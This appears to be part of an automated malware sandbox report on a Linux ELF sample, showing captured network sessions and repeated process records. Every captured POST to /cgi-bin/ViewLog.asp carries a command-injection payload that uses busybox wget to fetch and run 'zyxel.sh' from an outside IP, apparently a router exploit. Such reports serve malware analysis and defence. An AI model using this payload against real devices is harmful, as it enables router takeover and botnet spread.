                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1105192.168.2.234605831.136.161.2348080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:30.846045017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:34.029926062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:40.173088074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:52.203455925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:16.775800943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1106192.168.2.233308231.136.80.1288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:30.859678030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:34.029926062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:40.173088074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:52.203403950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:16.775801897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1107192.168.2.233954094.253.23.118080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:31.144476891 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:37.613548040 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:45.292440891 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:00.650311947 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            System Behavior

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:/tmp/uR2hnJKQGC.elf
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):08:27:40
                                                            Start date (UTC):14/02/2024
                                                            Path:/tmp/uR2hnJKQGC.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc